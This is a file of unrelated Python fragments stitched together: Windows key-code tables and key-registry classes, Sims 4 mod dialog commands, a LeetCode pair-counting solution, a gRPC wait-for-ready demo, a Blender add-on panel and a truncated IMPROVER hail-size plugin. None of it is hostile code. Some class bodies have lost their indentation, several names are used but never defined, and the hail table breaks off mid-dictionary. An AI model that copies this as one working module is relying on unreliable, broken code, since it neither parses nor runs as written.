CTRL_F5 = '\x00b'
CTRL_F6 = '\x00c'
CTRL_F7 = '\x00d' # Captured by something?
CTRL_F8 = '\x00e'
CTRL_F9 = '\x00f'
CTRL_F10 = '\x00g'
CTRL_F11 = '\xe0\x89'
CTRL_F12 = '\xe0\x8a'
CTRL_HOME = '\xe0w'
CTRL_END = '\xe0u'
CTRL_INSERT = '\xe0\x92'
CTRL_DELETE = '\xe0\x93'
CTRL_PAGE_DOWN = '\xe0v'
CTRL_2 = '\x00\x03'
CTRL_UP = '\xe0\x8d'
CTRL_DOWN = '\xe0\x91'
CTRL_LEFT = '\xe0s'
CTRL_RIGHT = '\xe0t'
CTRL_ALT_A = '\x00\x1e'
CTRL_ALT_B = '\x000'
CTRL_ALT_C = '\x00.'
CTRL_ALT_D = '\x00 '
CTRL_ALT_E = '\x00\x12'
CTRL_ALT_F = '\x00!'
CTRL_ALT_G = '\x00"'
CTRL_ALT_H = '\x00#'
CTRL_ALT_I = '\x00\x17'
CTRL_ALT_J = '\x00$'
CTRL_ALT_K = '\x00%'
CTRL_ALT_L = '\x00&'
CTRL_ALT_M = '\x002'
CTRL_ALT_N = '\x001'
CTRL_ALT_O = '\x00\x18'
CTRL_ALT_P = '\x00\x19'
CTRL_ALT_Q = '\x00\x10'
CTRL_ALT_R = '\x00\x13'
CTRL_ALT_S = '\x00\x1f'
CTRL_ALT_T = '\x00\x14'
CTRL_ALT_U = '\x00\x16'
CTRL_ALT_V = '\x00/'
CTRL_ALT_W = '\x00\x11'
CTRL_ALT_X = '\x00-'
CTRL_ALT_Y = '\x00\x15'
CTRL_ALT_Z = '\x00,'
CTRL_ALT_1 = '\x00x'
CTRL_ALT_2 = '\x00y'
CTRL_ALT_3 = '\x00z'
CTRL_ALT_4 = '\x00{'
CTRL_ALT_5 = '\x00|'
CTRL_ALT_6 = '\x00}'
CTRL_ALT_7 = '\x00~'
CTRL_ALT_8 = '\x00\x7f'
CTRL_ALT_9 = '\x00\x80'
CTRL_ALT_0 = '\x00\x81'
CTRL_ALT_MINUS = '\x00\x82'
CTRL_ALT_EQUALS = '\x00x83'
CTRL_ALT_BACKSPACE = '\x00\x0e'
ALT_F1 = '\x00h'
ALT_F2 = '\x00i'
ALT_F3 = '\x00j'
ALT_F4 = '\x00k'
ALT_F5 = '\x00l'
ALT_F6 = '\x00m'
ALT_F7 = '\x00n'
ALT_F8 = '\x00o'
ALT_F9 = '\x00p'
ALT_F10 = '\x00q'
ALT_F11 = '\xe0\x8b'
ALT_F12 = '\xe0\x8c'
ALT_HOME = '\x00\x97'
ALT_END = '\x00\x9f'
ALT_INSERT = '\x00\xa2'
ALT_DELETE = '\x00\xa3'
ALT_PAGE_UP = '\x00\x99'
ALT_PAGE_DOWN = '\x00\xa1'
ALT_LEFT = '\x00\x9b'
ALT_RIGHT = '\x00\x9d'
ALT_UP = '\x00\x98'
ALT_DOWN = '\x00\xa0'
CTRL_ALT_LEFT_BRACKET = '\x00\x1a'
CTRL_ALT_RIGHT_BRACKET = '\x00\x1b'
CTRL_ALT_SEMICOLON = '\x00\''
CTRL_ALT_SINGLE_QUOTE = '\x00('
CTRL_ALT_ENTER = '\x00\x1c'
CTRL_ALT_SLASH = '\x005'
CTRL_ALT_PERIOD = '\x004'
CTRL_ALT_COMMA = '\x003'
class ControlKeys(object):
def __init__(self, format='CTRL_{}'):
for i in range(0x20):
low_char = chr(i)
high_char = chr(i + 0x40)
name = ASCII_NAMES.get(high_char, high_char).upper()
ctrl_name = format.format(name)
setattr(self, ctrl_name, low_char)
class AsciiKeys(object):
def __init__(
self,
lower_format='{}', upper_format='SHIFT_{}', digit_format='N{}',
ascii_names=ASCII_NAMES,
):
for letter in string.ascii_lowercase:
name = lower_format.format(letter.upper())
setattr(self, name, letter)
for letter in string.ascii_uppercase:
name = upper_format.format(letter.upper())
setattr(self, name, letter)
for digit in string.digits:
name = digit_format.format(digit)
setattr(self, name, digit)
for char, name in ascii_names.items():
name = name.upper().replace(' ', '_')
setattr(self, name, char)
class Keys(object):
    """Bidirectional registry of key names <-> key codes.

    Built from a list of key-holder objects; every ALL-CAPS attribute of
    each holder is registered.  The first registration of a given name or
    code wins, so the order of *keyclasses* sets precedence.
    """
    def __init__(self, keyclasses):
        self.__names = dict()  # Map of codes -> names
        self.__codes = dict()  # Map of names -> codes
        self.__escapes = set()  # Every proper prefix of every known code
        for keyclass in keyclasses:
            for name in dir(keyclass):
                if self._is_key_name(name):
                    code = getattr(keyclass, name)
                    self.register(name, code)
    def register(self, name, code):
        """Record *name* <-> *code* without overwriting earlier entries,
        then collapse alias chains so canon()/name() reach a fixed point."""
        if name not in self.__codes:
            self.__codes[name] = code
        if code not in self.__names:
            self.__names[code] = name
        # Remember every prefix of the code so a reader knows the buffer
        # may still grow into a complete key sequence.
        for i in range(len(code)):
            self.__escapes.add(code[:i])
        # Update towards canonicity
        while True:
            canon_code = self.canon(code)
            canon_canon_code = self.canon(canon_code)
            if canon_code != canon_canon_code:
                self.__codes[self.name(code)] = canon_canon_code
            else:
                break
        while True:
            canon_name = self.name(self.code(name))
            canon_canon_name = self.name(self.code(canon_name))
            if canon_name != canon_canon_name:
                self.__names[self.code(name)] = canon_canon_name
            else:
                break
    @property
    def escapes(self):
        """Set of code prefixes that may still extend into a full key code."""
        return self.__escapes
    @property
    def names(self):
        """View of all registered key names."""
        return self.__codes.keys()
    def name(self, code):
        """Return the name registered for *code*, or None if unknown."""
        return self.__names.get(code)
    def code(self, name):
        """Return the code registered for *name*, or None if unknown."""
        return self.__codes.get(name)
    def canon(self, code):
        """Return the canonical code equivalent to *code* (itself if unknown)."""
        name = self.name(code)
        return self.code(name) if name else code
    def __getattr__(self, name):
        # Allow attribute-style access (keys.KEY_NAME) for registered names.
        code = self.code(name)
        if code is not None:
            return code
        else:
            return self.__getattribute__(name)
    def _is_key_name(self, name):
        # Key attributes are ALL CAPS and not private/dunder names.
        return name == name.upper() and not name.startswith('_')
# Priority-ordered key sources: earlier entries win when the same name or
# code appears more than once (see Keys.register, which never overwrites).
windows_keys = Keys([
    WindowsKeys(),
    AsciiKeys(),
    ControlKeys(),
    UnicodeAsciiKeys(),
    JargonKeys(),
    IntercalKeys()
])
# Lookup used by Platform.__init__ when KEYS is given as a platform-name string.
PLATFORM_KEYS = {
    'windows': windows_keys,
}
class Platform(object):
    """Base class for per-OS key reading.

    Subclasses must define KEYS (a Keys instance or a PLATFORM_KEYS name)
    and INTERRUPTS (key name -> exception to raise), and must override at
    least one of getchar()/getchars().
    """
    def __init__(self, keys=None, interrupts=None):
        keys = keys or self.KEYS
        if isinstance(keys, str):
            # A string selects a predefined key table by platform name.
            keys = PLATFORM_KEYS[keys]
        self.key = self.keys = keys
        if interrupts is None:
            interrupts = self.INTERRUPTS
        # Resolve interrupt key names to key codes once, up front.
        self.interrupts = {
            self.keys.code(name): action
            for name, action in interrupts.items()
        }
        # The two default readers below call each other; a subclass that
        # overrides neither would recurse forever, so fail fast here.
        assert (
            self.__class__.getchar != Platform.getchar or
            self.__class__.getchars != Platform.getchars
        )
    def getkey(self, blocking=True):
        """Read one key: accumulate chars while the buffer is a known escape
        prefix, canonicalize it, and raise any configured interrupt."""
        buffer = ''
        for c in self.getchars(blocking):
            buffer += str(c)
            if buffer not in self.keys.escapes:
                break
        keycode = self.keys.canon(buffer)
        if keycode in self.interrupts:
            interrupt = self.interrupts[keycode]
            if isinstance(interrupt, BaseException) or \
                issubclass(interrupt, BaseException):
                raise interrupt
            else:
                raise NotImplementedError('Unimplemented interrupt: {!r}'
                    .format(interrupt))
        return keycode
    def bang(self):
        """Debug loop: print the name and repr of every key pressed."""
        while True:
            code = self.getkey(True)
            name = self.keys.name(code) or '???'
            print('{} = {!r}'.format(name, code))
    # You MUST override at least one of the following
    def getchars(self, blocking=True):
        """Yield one (optionally blocking) char, then drain buffered chars."""
        char = self.getchar(blocking)
        while char:
            yield char
            char = self.getchar(False)
    def getchar(self, blocking=True):
        """Return the next available char, or None when nothing is pending."""
        for char in self.getchars(blocking):
            return char
        else:
            return None
class PlatformWindows(Platform):
    """Key reading on Windows via the msvcrt console API."""
    KEYS = 'windows'
    INTERRUPTS = {'CTRL_C': KeyboardInterrupt}
    def __init__(self, keys=None, interrupts=None, msvcrt=None):
        super(PlatformWindows, self).__init__(keys, interrupts)
        # An msvcrt-like object may be injected (e.g. for tests);
        # default to the real module.
        if msvcrt is None:
            import msvcrt
        self.msvcrt = msvcrt
    def getchars(self, blocking=True):
        """Get characters on Windows."""
        if blocking:
            yield self.msvcrt.getch()
        # Drain whatever else is already waiting in the console buffer.
        while self.msvcrt.kbhit():
            yield self.msvcrt.getch()
class Input_TextInputLength(HasTunableSingletonFactory, AutoFactoryInit):
    """Length restriction applied to a dialog text-input field."""
    __qualname__ = 'Input_TextInputLength'
    def build_msg(self, dialog, msg, *additional_tokens):
        # Accept anything from empty up to 255 characters, with no
        # too-short tooltip text.
        msg.max_length = 255
        msg.min_length = 0
        msg.input_too_short_tooltip = LocalizationHelperTuning.get_raw_text("")
class DialogTestUiDialogTextInput(UiDialog):
    """Dialog that records text typed into its named input fields."""
    __qualname__ = 'DialogTestUiDialogTextInput'
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Maps text_input_name -> the string the user entered.
        self.text_input_responses = {}
    def on_text_input(self, text_input_name='', text_input=''):
        """Store the user's response for later retrieval by the listener."""
        self.text_input_responses[text_input_name] = text_input
        # NOTE(review): returns False — presumably "not fully handled";
        # confirm against the UiDialog.on_text_input contract.
        return False
    def build_msg(self, text_input_overrides=None, additional_tokens=(), **kwargs):
        """Add a single text input named "userinput" to the dialog message."""
        msg = super().build_msg(additional_tokens=additional_tokens, **kwargs)
        text_input_msg1 = msg.text_input.add()
        text_input_msg1.text_input_name = "userinput"
        # text_input_msg1.max_length = nn
        # text_input_msg1.min_length = nn
        return msg
class DialogTestUiDialogTextInputOkCancel(UiDialogOkCancel, DialogTestUiDialogTextInput):
    """Ok/Cancel dialog variant carrying a single named text input."""
    __qualname__ = 'DialogTestUiDialogTextInputOkCancel'
    TEXT_INPUT_NAME = 'name'
    class input_text:
        # Factory wiring the named text input into the tunable dialog.
        DIALOG = UiDialogTextInputOkCancel.TunableFactory(text_inputs=(TEXT_INPUT_NAME,))
##
## Get input from user dialog test
##
def inputbox(title: str, text: str, callback, initial_value: str = ""):
    """Show a text-input Ok/Cancel dialog and pass the entered text to *callback*.

    Args:
        title: Dialog title text.
        text: Dialog body text.
        callback: Called with the entered string only when the dialog is
            accepted; cancelling invokes nothing.
        initial_value: Text pre-filled into the input field.
    """
    def inputbox_callback(dialog):
        # Removed a dead outer local and a no-op else branch from the
        # original; behavior on accept is unchanged.
        if dialog.accepted:
            callback(dialog.text_input_responses.get("search_terms"))
    client = services.client_manager().get_first_client()
    text_input = UiTextInput(sort_order=0, restricted_characters=None)
    text_input.default_text = None
    text_input.title = None
    text_input.max_length = 255
    text_input.initial_value = lambda **_: LocalizationHelperTuning.get_raw_text(initial_value)
    text_input.check_profanity = False
    text_input.length_restriction = Input_TextInputLength()
    text_input.height = None
    inputs = AttributeDict({'search_terms': text_input})
    dialog = UiDialogTextInputOkCancel.TunableFactory().default(
        client.active_sim,
        text=lambda **_: LocalizationHelperTuning.get_raw_text(text),
        title=lambda **_: LocalizationHelperTuning.get_raw_text(title),
        text_inputs=inputs)
    dialog.add_listener(inputbox_callback)
    dialog.show_dialog()
def get_input_callback(input_str):
    """Example callback: show the captured input as a notification
    addressed to the active sim."""
    client = services.client_manager().get_first_client()
    sim_info = client.active_sim.sim_info
    ld_notice(sim_info, "get_input_callback", input_str)
##
## Ok/Cancel dialog test
##
@sims4.commands.Command('dialogtest.okcancel', command_type=sims4.commands.CommandType.Live)
def dialogtest_okcancel(_connection=None):
    """Cheat command: show a simple Ok/Cancel dialog and report the choice.

    Fix: the final line had stray dataset metadata fused onto it, making
    the source syntactically invalid; it has been removed.
    """
    output = sims4.commands.CheatOutput(_connection)
    def dialogtest_okcancel_callback(dialog):
        if dialog.accepted:
            output("User pressed OK")
        else:
            output("User pressed CANCEL")
    title = "Dialog Test 1"
    text = "Please press OK to continue, or Cancel."
    client = services.client_manager().get_first_client()
    dialog = UiDialogOkCancel.TunableFactory().default(
        client.active_sim,
        text=lambda **_: LocalizationHelperTuning.get_raw_text(text),
        title=lambda **_: LocalizationHelperTuning.get_raw_text(title))
    dialog.add_listener(dialogtest_okcancel_callback)
    dialog.show_dialog()
class Solution:
    """LeetCode 532: count unique k-diff pairs in an array.

    Fixes: *k* was an undefined free variable inside both private helpers,
    and findPairs discarded the helper's result instead of returning it.
    """
    def __method1(self, nums, k):
        """Two-pointer scan over the sorted array; O(n log n) time, O(1) space."""
        nums.sort()
        i, j, count = 0, 1, 0
        while (j < len(nums)):
            diff = nums[j] - nums[i]
            if (diff == k):
                count += 1
                # Skip duplicates of nums[j] so each pair is counted once.
                while (((j + 1) < len(nums)) and (nums[j] == nums[j + 1])): j += 1
                j += 1
            elif (diff > k): i += 1
            else: j += 1
            if (i == j): j += 1
        return count
    def __method2(self, nums, k):
        """Hash-map counting; O(n) time, O(n) space."""
        hm, count = {}, 0
        for num in nums:
            if (num not in hm): hm[num] = 0
            hm[num] += 1
        for key in hm.keys():
            if (((k > 0) and ((key + k) in hm)) or ((k == 0) and (hm[key] > 1))): count += 1
        return count
    def findPairs(self, nums: List[int], k: int) -> int:
        """Return the number of unique pairs (a, b) with b - a == k."""
        # Alternative: return self.__method2(nums, k)
        return self.__method1(nums, k)
from concurrent import futures
from contextlib import contextmanager
import logging
import socket
import threading
import grpc
# Generate the protobuf message and stub modules at runtime from the
# .proto definition instead of shipping pre-generated code.
helloworld_pb2, helloworld_pb2_grpc = grpc.protos_and_services(
    "helloworld.proto"
)
# Module-level logger for reporting each RPC's outcome.
_LOGGER = logging.getLogger(__name__)
_LOGGER.setLevel(logging.INFO)
@contextmanager
def get_free_loopback_tcp_port():
    """Yield a free loopback address of the form "localhost:<port>".

    The socket stays bound for the duration of the context (reserving the
    port number) and is always closed on exit — previously it leaked if
    the with-body raised.
    """
    if socket.has_ipv6:
        tcp_socket = socket.socket(socket.AF_INET6)
    else:
        tcp_socket = socket.socket(socket.AF_INET)
    try:
        tcp_socket.bind(("", 0))
        address_tuple = tcp_socket.getsockname()
        yield "localhost:%s" % (address_tuple[1])
    finally:
        tcp_socket.close()
class Greeter(helloworld_pb2_grpc.GreeterServicer):
    """Minimal Greeter service used to demonstrate wait-for-ready."""
    def SayHello(self, request, unused_context):
        # Echo the caller's name back in the greeting message.
        return helloworld_pb2.HelloReply(message="Hello, %s!" % request.name)
def create_server(server_address):
    """Build a gRPC server with the Greeter service bound (insecurely)
    to *server_address* ("host:port")."""
    server = grpc.server(futures.ThreadPoolExecutor())
    helloworld_pb2_grpc.add_GreeterServicer_to_server(Greeter(), server)
    bound_port = server.add_insecure_port(server_address)
    # The address carries an explicit port; binding must honour it exactly.
    assert bound_port == int(server_address.split(":")[-1])
    return server
def process(stub, wait_for_ready=None):
    """Issue one SayHello RPC and log the outcome.

    With wait_for_ready the call is expected to queue until the channel is
    ready and then succeed; without it the call is expected to fail with
    UNAVAILABLE while the server is down.
    """
    try:
        response = stub.SayHello(
            helloworld_pb2.HelloRequest(name="you"),
            wait_for_ready=wait_for_ready,
        )
        message = response.message
    except grpc.RpcError as rpc_error:
        # Failure path: only valid when wait_for_ready was disabled.
        assert rpc_error.code() == grpc.StatusCode.UNAVAILABLE
        assert not wait_for_ready
        message = rpc_error
    else:
        # Success path: only valid when wait_for_ready was enabled.
        assert wait_for_ready
    _LOGGER.info(
        "Wait-for-ready %s, client received: %s",
        "enabled" if wait_for_ready else "disabled",
        message,
    )
def main():
    """Demonstrate wait-for-ready: start two RPCs before the server exists.

    The RPC without wait_for_ready fails fast with UNAVAILABLE; the RPC
    with wait_for_ready queues until the server is started and succeeds.
    """
    # Pick a random free port
    with get_free_loopback_tcp_port() as server_address:
        # Register connectivity event to notify main thread
        transient_failure_event = threading.Event()
        def wait_for_transient_failure(channel_connectivity):
            if (
                channel_connectivity
                == grpc.ChannelConnectivity.TRANSIENT_FAILURE
            ):
                transient_failure_event.set()
        # Create gRPC channel
        channel = grpc.insecure_channel(server_address)
        channel.subscribe(wait_for_transient_failure)
        stub = helloworld_pb2_grpc.GreeterStub(channel)
        # Fire an RPC without wait_for_ready
        thread_disabled_wait_for_ready = threading.Thread(
            target=process, args=(stub, False)
        )
        thread_disabled_wait_for_ready.start()
        # Fire an RPC with wait_for_ready
        thread_enabled_wait_for_ready = threading.Thread(
            target=process, args=(stub, True)
        )
        thread_enabled_wait_for_ready.start()
        # Wait for the channel entering TRANSIENT FAILURE state, which
        # proves both RPCs were attempted before the server existed.
        transient_failure_event.wait()
        server = create_server(server_address)
        server.start()
        # Expected to fail with StatusCode.UNAVAILABLE.
        thread_disabled_wait_for_ready.join()
        # Expected to succeed.
        thread_enabled_wait_for_ready.join()
        server.stop(None)
        channel.close()
# Script entry point (stray dataset metadata removed from the trailing line).
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    main()
import bpy, platform
from functions import *
class TrackPanel(bpy.types.Panel):
    '''Panel holding the add-on controls for a single track.'''
    bl_space_type = "CLIP_EDITOR"
    bl_region_type = "TOOLS"
    bl_label = "Single track"
    bl_category = "Curve Anim"
    def draw(self, context):
        '''Draw the add-on UI.'''
        layout = self.layout
        # check if there is a movie clip set
        if(context.space_data.clip is not None):
            clip = context.space_data.clip
            # draw panel
            clip.curve_to_frame.draw_panel(context, layout, clip)
        else:
            # Display a request for a movie clip
            row = layout.row()
            row.label(
                text="Select/load an image sequence in the Movie Editor.",
                icon="ERROR" )
            row = layout.row()
            row.template_ID(context.space_data, 'clip', open='clip.open' )
class Panel():
    '''Class containing all needed methods to draw the single/multi track panel.

    Fixes: grammar in three user-facing UI strings and removal of stray
    dataset metadata fused after the class body.
    '''
    def draw_panel(self, context, layout, clip):
        '''Draw the single track panel layout'''
        # draw movieclip load error if required
        error = self.draw_load_error( layout, clip )
        if not error:
            refresh_curve = "curve_to_frame.generate_single_track_curves"
            refresh_mini_maxi =\
                "curve_to_frame.single_track_get_amplitude_range"
            restore_peak_shape =\
                "curve_to_frame.single_track_default_peak_shape"
            run_operator = "curve_to_frame.render_single_track"
            # draw Movie info & settings
            self.draw_track_info( layout )
            # draw amplitude settings
            self.draw_amplitude( layout,
                refresh_curve, refresh_mini_maxi )
            # draw peaks rhythm settings
            self.draw_peak(layout, refresh_curve )
            # draw peaks profile settings
            self.draw_peak_shape( layout, refresh_curve,
                restore_peak_shape )
            # draw combination node settings and combination and output value
            self.draw_combination( layout, refresh_curve )
            # draw run button or error message
            self.draw_run_button( layout, run_operator, context.scene )
    def draw_load_error(self, layout, clip):
        '''Draw track load error part of single track panel'''
        if(clip.source != 'SEQUENCE'):
            # Display an error message, requesting for a sequence of images
            row = layout.row()
            row.label( text="Current movie can't be used by the addon.",
                icon="ERROR" )
            row = layout.row()
            row.label( text="Only image sequences are accepted." )
            row = layout.row()
            row.template_ID(bpy.context.space_data, 'clip', open='clip.open' )
            return True
        elif(not self.init):
            # ask to initialize curve to frame on this MovieClip
            row = layout.row()
            row.operator(
                "curve_to_frame.init_track",
                text="initialize MovieClip info")
            return True
        return False
    def draw_track_info(self, layout):
        '''Draw track info and settings part of single and multi track panels'''
        # Display the directory path
        row = layout.row()
        col = row.column()
        col.label( text = "Frame Directory path:" )
        col = row.column()
        col.operator(
            "curve_to_frame.init_track",
            icon = 'FILE_REFRESH',
            text = '')
        row = layout.row()
        row.label( text= self.path )
        # Display frame extension
        row = layout.row()
        col = row.column()
        col.label( text="File type: "+self.ext )
        # Display first to last accepted frame name range
        col = row.column()
        col.label( text="Valid frames: "\
            +self.get_frame_name(self.first)+' to '\
            +self.get_frame_name(self.last) )
        # Display Start/End settings
        layout.separator()
        row = layout.row()
        col = row.column()
        col.prop(self, "start")
        col = row.column()
        col.prop(self, "end")
        layout.separator()
    def draw_amplitude(
            self,
            layout,
            refresh_curve,
            refresh_mini_maxi):
        '''Draw amplitude settings part of single and multi track panels'''
        # A float amplitude field
        row = layout.row()
        col = row.column()
        col.prop(self, "amplitude")
        # A field to remind F-Curve min and max value
        fCurve = get_fcurve_by_data_path(self.id_data, 'curve_to_frame.amplitude')
        if(fCurve is None):
            m = M = self.amplitude
        else:
            m, M = get_curve_limit(fCurve)
        m = round(m*1000)/1000
        M = round(M*1000)/1000
        col = row.column()
        col.label( text = "(Goes from "+str(m)\
            +" to "+str(M)+')' )
        # A field to set the min F-Curve Value to
        # assign to the first frames
        row = layout.row()
        col = row.column()
        col.prop(self, "mini")
        # A field to set the max F-Curve Value to
        # assign to the last frames
        col = row.column()
        col.prop(self, "maxi")
        if(self.combination_mode == 'ignore_amplitude'):
            col.enabled = False
        # A button to get curve min max value
        col = row.column()
        col.operator(refresh_mini_maxi,
            text = 'auto')
        # display net amplitude value
        col = row.column()
        col.enabled = False
        col.prop(self, "amplitude_net")
        col = row.column()
        col.operator(
            refresh_curve,
            text='',
            icon='FILE_REFRESH')
    def draw_peak(self, layout, refresh_curve):
        '''Draw peak rate settings part of single and multi track panels'''
        # peaks rate settings
        layout.separator()
        row = layout.row()
        col = row.column()
        col.prop(self, "rate")
        col = row.column()
        col.prop(self, "rate_unit", text='')
        col = row.column()
        col.prop(self, "auto_constant")
        col = row.column()
        col.prop(self, "accuracy")
        # amplitude synchronized settings
        row = layout.row()
        col = row.column()
        col.prop(self, "synchronized")
        col = row.column()
        if (not self.synchronized):
            col.enabled = False
        col.prop(self, "anticipate")
        # resulting settings
        col = row.column()
        col.enabled = False
        col.prop(self, "peaks")
        col = row.column()
        col.operator(
            refresh_curve,
            text='',
            icon='FILE_REFRESH')
    def draw_peak_shape(
            self,
            layout,
            refresh_curve,
            restore_shape
            ):
        '''Draw peak shape settings part of single and multi track panels'''
        layout.separator()
        row = layout.row()
        # restore default shape button
        col = row.column()
        col.operator(
            restore_shape,
            text='',
            icon='LOAD_FACTORY')
        # display peaks shapes settings
        col = row.column()
        col.prop(self, "peaks_shape")
        col = row.column()
        col.prop(self, "peaks_shape_range_start")
        col = row.column()
        col.prop(self, "peaks_shape_range_end")
        # refresh curve
        col = row.column()
        col.operator(
            refresh_curve,
            text='',
            icon='FILE_REFRESH')
    def draw_combination(
            self,
            layout,
            refresh_curve,
            no_output=False ):
        '''Draw combination settings part of single and multi track panels'''
        # combination mode field
        layout.separator()
        row = layout.row()
        col = row.column()
        col.prop(self, 'combination_mode')
        # visualize combination of peaks and amplitude curve
        col = row.column()
        col.enabled = False
        col.prop(self, "combination")
        row = layout.row()
        # visualize output frame
        if not no_output:
            col = row.column()
            col.enabled = False
            col.prop(self, "output")
        # refresh curve
        col = row.column()
        col.operator(
            refresh_curve,
            text='',
            icon='FILE_REFRESH')
        layout.separator()
    def draw_run_button( self, layout, run_operator, scene ):
        '''Draw single track run button and warning message'''
        warning = (not scene.ctf_real_copy \
                and platform.system().lower() not in ['linux', 'unix'])
        row = layout.row()
        col = row.column()
        if( check_driver(self.id_data, 'curve_to_frame.' ) ):
            # check no driver is used on a curve to frame property
            col.label(text='This function can\'t be used with driver!',
                icon='ERROR')
        elif(warning):
            # non-linux platform without real copy: warn before running
            col.operator(
                run_operator,
                text="ignore warning and run at my own risk",
                icon = 'ERROR')
            # A checkbox to get real frame file copy
            col = row.column()
            col.prop( scene, "ctf_real_copy", icon='ERROR' )
            warning = True
        else:
            # draw standard run button
            col.operator(
                run_operator,
                text="run")
            # A checkbox to get real frame file copy
            col = row.column()
            col.prop( scene, "ctf_real_copy" )
from bisect import bisect_right
from typing import List, Tuple
import numpy as np
from iris.cube import Cube
from iris.exceptions import CoordinateNotFoundError
from improver import BasePlugin
from improver.metadata.utilities import (
create_new_diagnostic_cube,
generate_mandatory_attributes,
)
from improver.psychrometric_calculations.psychrometric_calculations import (
adjust_for_latent_heat,
dry_adiabatic_temperature,
saturated_humidity,
)
from improver.utilities.cube_checker import assert_spatial_coords_match
from improver.utilities.cube_extraction import ExtractPressureLevel
from improver.utilities.cube_manipulation import enforce_coordinate_ordering
class HailSize(BasePlugin):
"""Plugin to calculate the diameter of the hail stones from input cubes
cloud condensation level (ccl) temperature, cloud condensation level pressure,
temperature on pressure levels, the height of the wet bulb freezing level
above sea level and orography.
From these, the values for three other cubes are calculated:
- Temperature of the environment at 268.15K (-5 Celsius) and the
pressure level where this occurs.
- Temperature after a saturated ascent from ccl pressure to the
pressure of the environment at 268.15K (-5 Celsius).
- Temperature after a dry adiabatic descent from the pressure of the
environment at 268.15K (-5 Celsius) to the ccl pressure.
From these, two indexes are calculated as:
- Temperature after a dry adiabatic descent - the temperature of the
atmosphere at 268.15K
- Temperature after a saturated ascent - the temperature of the
atmosphere at 268.15K
These indexes can then be used to extract values of hail size depending on
the wet bulb freezing altitude. The wet bulb freezing altitude is calculated
by subtracting the orography from the wet bulb freezing altitude above sea level.
If the wet bulb freezing altitude is between 3350m and 4400m then the indexes are used
to extract an initial hail value from the first table. A second table
is then accessed to reduce the hail size. The second table is stored as a dictionary, with the
key being the wet bulb freezing altitude and each column in the associated
arrays referring to the previously calculated hail diameter being less than a pre-defined
value. An updated hail_size is then extracted and stored.
If the wet_bulb_freezing_altitude is greater than 4400m then the hail size is set to
0 and if the wet bulb_freezing_altitude is less than 3350m then the originally calculated
hail size is not altered.
Both tables are taken from Hand and Cappelluti (2011) which are a tabular versions of the
graphs from Fawbush and Miller(1953)
References
- Hand, W., and G. Cappelluti. 2011. “A global hail climatology using the UK
Met Office convection diagnosis procedure (CDP) and model analyses.”
Meteorological Applications 18: 446-458. doi:https://doi.org/10.1002/met.236
- Fawbush, E.J., and R.C. Miller. 1953. “A method for forecasting hailstone size
at the earth's surface.” Bulletin of the American Meteorological Society 34: 235-244.
doi: https://doi.org/10.1175/1520-0477-34.6.235
"""
    def __init__(self, model_id_attr: str = None):
        """Sets up Class

        Args:
            model_id_attr:
                Name of model ID attribute to be copied from source cubes to output cube
        """
        # Set by check_cubes to the input cube's dimension order.
        self.final_order = None
        self.model_id_attr = model_id_attr
        # Cache the wet-bulb-freezing-height reduction table once: altitude
        # keys, hail-size group boundaries, and the replacement-size array.
        (
            self._wbzh_keys,
            self._hail_groups,
            self._updated_values,
        ) = self.updated_nomogram()
    @staticmethod
    def nomogram_values() -> np.ndarray:
        """Sets-up an array of a table containing possible diameter of hail stones(mm).
        It is a transposed version of the table in Hand and Cappelluti (2011).
        The axes of the table are as follows:

        - Horizontal axis is calculated from two values: the temperature after a
          dry adiabatic descent from the pressure of atmosphere at 268.15K to the
          cloud condensation level pressure and the temperature of the atmosphere
          at 268.15K. Each column represents a value calculated as the temperature
          after the dry adiabatic descent minus the temperature of the atmosphere
          at 268.15K rounded to the nearest 0.5K.
        - The vertical axis is also calculated from two values: the temperature after
          a saturated ascent from the ccl pressure to the pressure of environment at
          268.15K and the temperature of the atmosphere at 268.15K.
          Each row is represented by a value calculated as the temperature after
          the saturated ascent minus the temperature of the atmosphere at 268.15K
          rounded to the nearest 5K.
        """
        # Hail diameters (mm); rows = saturated-ascent index, cols = descent index.
        lookup_nomogram = np.array(
            [
                [0, 0, 0, 2, 2, 5, 5, 5, 5, 5],
                [0, 0, 0, 2, 5, 5, 5, 5, 10, 10],
                [0, 0, 2, 2, 5, 5, 10, 10, 15, 15],
                [0, 0, 2, 2, 5, 10, 15, 15, 20, 20],
                [0, 0, 2, 2, 10, 15, 20, 20, 20, 20],
                [0, 2, 2, 5, 15, 20, 20, 20, 25, 25],
                [0, 2, 5, 10, 20, 20, 25, 25, 30, 30],
                [2, 2, 10, 15, 20, 25, 30, 30, 35, 35],
                [2, 5, 10, 20, 25, 30, 35, 35, 40, 40],
                [2, 5, 15, 20, 30, 35, 40, 40, 45, 45],
                [2, 5, 15, 20, 30, 40, 40, 40, 45, 50],
                [2, 10, 20, 25, 35, 40, 45, 45, 50, 50],
                [5, 10, 20, 25, 40, 40, 45, 50, 55, 55],
                [5, 15, 20, 30, 40, 45, 50, 55, 60, 60],
                [5, 15, 25, 30, 40, 45, 55, 60, 60, 65],
                [5, 15, 25, 35, 40, 50, 55, 60, 65, 75],
                [10, 15, 25, 35, 45, 50, 60, 65, 70, 80],
                [10, 15, 25, 40, 45, 55, 60, 70, 80, 85],
                [10, 15, 30, 40, 45, 55, 65, 75, 85, 90],
                [10, 20, 30, 40, 50, 60, 70, 80, 90, 100],
                [10, 20, 30, 40, 50, 60, 70, 80, 95, 105],
                [10, 20, 35, 45, 50, 60, 75, 85, 100, 110],
                [10, 20, 35, 45, 50, 60, 75, 90, 105, 115],
                [15, 25, 35, 45, 50, 65, 80, 100, 110, 120],
                [15, 25, 35, 45, 55, 65, 80, 100, 110, 120],
                [15, 25, 35, 50, 55, 65, 80, 100, 110, 120],
            ],
            np.int8,
        )
        return lookup_nomogram
    @staticmethod
    def updated_nomogram() -> Tuple[List, List, np.array]:
        """Sets up a dictionary of updated hail diameter values (mm).

        The dictionary keys are the height of the wet bulb freezing level (m) where,
        when accessing at some height value, it should be rounded to the nearest lower value
        (e.g. 3549m should access 3350m key).
        Each key has an associated list in which each element is a new hail diameter based on
        the original hail size that was calculated from nomogram_values table.
        Specifically each column associated hail size (mm) is [<5,<10,<20,<25,<50,<75,<100,<125].
        The largest possible value where the equality still holds should be used.
        If the wet bulb freezing height is less than 3350m then the original hail size is used.
        If the wet bulb freezing height is greater than 4400m then all hail sizes are set to 0.
        """
        # Rows: wet-bulb freezing height bands; columns: original-size groups.
        lookup_dict = {
            3350: [0, 5, 10, 15, 25, 50, 65, 75],
            3550: [0, 0, 5, 10, 20, 20, 25, 30],
